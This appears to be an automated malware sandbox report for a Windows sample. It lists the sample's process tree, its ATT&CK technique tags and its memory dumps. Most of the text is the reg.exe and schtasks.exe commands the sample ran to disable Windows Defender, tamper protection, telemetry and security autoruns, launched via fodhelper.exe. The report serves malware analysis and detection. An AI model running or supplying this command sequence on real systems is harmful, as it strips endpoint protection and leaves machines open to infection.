schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
4⤵
PID:4868

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
4⤵
PID:4268

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
4⤵
- Suspicious use of WriteProcessMemory
PID:4452

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:2280

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
4⤵
PID:3300

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
4⤵
PID:2264

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
4⤵
PID:4296

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
4⤵
- Modifies registry class
PID:4772

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
4⤵
- Modifies registry class
PID:1776

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
4⤵
- Modifies registry class
PID:4284

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
4⤵
PID:1252

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:4456

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:5004

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
4⤵
- Modifies security service
PID:5860

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:5852

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:5844

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:5836

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:5828

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:5820

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:5812

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:5804

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
4⤵
PID:5796

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
4⤵
PID:5788

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
4⤵
PID:5780

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
4⤵
PID:5768

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
4⤵
PID:5760

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
4⤵
PID:5752

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
4⤵
PID:5744

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:5736

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
- Modifies Windows Defender Real-time Protection settings
PID:920

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:5728

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
4⤵
PID:5720

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
4⤵
PID:5712

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
4⤵
PID:5704

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
4⤵
PID:5696

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:5688

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:5680

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:5672

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:5664

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:5656

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f
4⤵
PID:5648

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
4⤵
PID:5640

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
PID:5632

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:5624

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
4⤵
PID:5616

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
4⤵
- Modifies security service
PID:5176

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:5168

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:3180

C:\Windows\System32\fodhelper.exe
"C:\Windows\System32\fodhelper.exe"
2⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:488

C:\Users\Admin\AppData\Local\Temp\bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
"C:\Users\Admin\AppData\Local\Temp\bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe" -wdkill
3⤵
- Suspicious use of WriteProcessMemory
PID:5048

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
4⤵
PID:5036

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
4⤵
PID:4608

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1628

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
4⤵
PID:920

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:3140

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f
4⤵
PID:4464

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
PID:4604

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:4348

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:324

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
4⤵
PID:3488

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
4⤵
PID:1932

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
4⤵
PID:2412

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1040

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
4⤵
PID:4084

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:1116

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:4852

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
4⤵
PID:5080

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
4⤵
PID:3228

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
4⤵
PID:3952

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
4⤵
PID:4816

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
4⤵
PID:220

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:4832

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:824

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
4⤵
PID:4484

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
4⤵
PID:768

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:352

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:4724

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:4900

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
4⤵
- Modifies security service
PID:5296

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:5288

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:4292

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
4⤵
- Modifies security service
PID:944

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:3380

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:4548

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:2136

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:648

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:508

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:1332

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:4300

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
4⤵
PID:4340

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
4⤵
PID:1476

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
4⤵
PID:6136

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
4⤵
PID:6128

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
4⤵
PID:6120

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
4⤵
PID:6112

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
4⤵
PID:6104

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:4608

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:6092

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:6084

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
4⤵
PID:6076

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
4⤵
PID:6068

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
4⤵
PID:6060

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
4⤵
PID:6052

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:6044

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:6036

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:6028

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:6020

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:6012

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f
4⤵
PID:6004

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
4⤵
PID:5996

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
PID:5988

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:5980

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
4⤵
PID:5972

C:\Windows\System32\fodhelper.exe
"C:\Windows\System32\fodhelper.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:4808

C:\Users\Admin\AppData\Local\Temp\bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe
"C:\Users\Admin\AppData\Local\Temp\bec7f761c529f547e16cc2867fd6bf96bd0e6a6740d70da8c57789fdbb71f9b3.exe" -prs 2656
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4536

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/220-556-0x0000000000000000-mapping.dmp

Download
memory/324-371-0x0000000000000000-mapping.dmp

Download
memory/352-768-0x0000000000000000-mapping.dmp

Download
memory/488-226-0x0000000000000000-mapping.dmp

Download
memory/768-532-0x0000000000000000-mapping.dmp

Download
memory/776-343-0x0000000000000000-mapping.dmp

Download
memory/816-354-0x0000000000000000-mapping.dmp

Download
memory/824-663-0x0000000000000000-mapping.dmp

Download
memory/920-350-0x0000000000000000-mapping.dmp

Download
memory/1040-382-0x0000000000000000-mapping.dmp

Download
memory/1116-442-0x0000000000000000-mapping.dmp

Download
memory/1252-533-0x0000000000000000-mapping.dmp

Download
memory/1628-361-0x0000000000000000-mapping.dmp

Download
memory/1776-668-0x0000000000000000-mapping.dmp

Download
memory/1932-415-0x0000000000000000-mapping.dmp

Download
memory/2264-612-0x0000000000000000-mapping.dmp

Download
memory/2280-450-0x0000000000000000-mapping.dmp

Download
memory/2304-377-0x0000000000000000-mapping.dmp

Download
memory/2412-393-0x0000000000000000-mapping.dmp

Download
memory/2656-149-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-129-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-140-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-141-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-142-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-144-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-145-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-146-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-148-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-147-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-151-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-150-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-120-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-143-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-152-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-153-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-154-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-156-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-157-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-159-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-158-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-160-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-155-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-161-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-164-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-165-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-166-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-163-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-168-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-167-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-162-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-169-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-172-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-171-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-170-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-175-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-174-0x0000000073D00000-0x0000000073D3A000-memory.dmp

Filesize
232KB

Download
memory/2656-173-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-176-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-177-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-178-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-180-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-181-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-182-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-183-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-184-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-179-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-216-0x0000000073CD0000-0x0000000073D0A000-memory.dmp

Filesize
232KB

Download
memory/2656-217-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2656-138-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-121-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-119-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-122-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-123-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-124-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-137-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-125-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-127-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2656-128-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-700-0x0000000000400000-0x00000000007E4000-memory.dmp

Filesize
3.9MB

Download
memory/2656-126-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-136-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-135-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-130-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-139-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-131-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-132-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-133-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2656-134-0x0000000077770000-0x00000000778FE000-memory.dmp

Filesize
1.6MB

Download
memory/2716-309-0x0000000000000000-mapping.dmp

Download
memory/2732-388-0x0000000000000000-mapping.dmp

Download
memory/2748-435-0x0000000000000000-mapping.dmp

Download
memory/3140-339-0x0000000000000000-mapping.dmp

Download
memory/3156-334-0x0000000000000000-mapping.dmp

Download
memory/3180-774-0x0000000000000000-mapping.dmp

Download
memory/3228-511-0x0000000000000000-mapping.dmp

Download
memory/3300-557-0x0000000000000000-mapping.dmp

Download
memory/3376-410-0x0000000000000000-mapping.dmp

Download
memory/3488-404-0x0000000000000000-mapping.dmp

Download
memory/3904-399-0x0000000000000000-mapping.dmp

Download
memory/3952-609-0x0000000000000000-mapping.dmp

Download
memory/4084-428-0x0000000000000000-mapping.dmp

Download
memory/4268-486-0x0000000000000000-mapping.dmp

Download
memory/4284-695-0x0000000000000000-mapping.dmp

Download
memory/4292-791-0x0000000000000000-mapping.dmp

Download
memory/4296-584-0x0000000000000000-mapping.dmp

Download
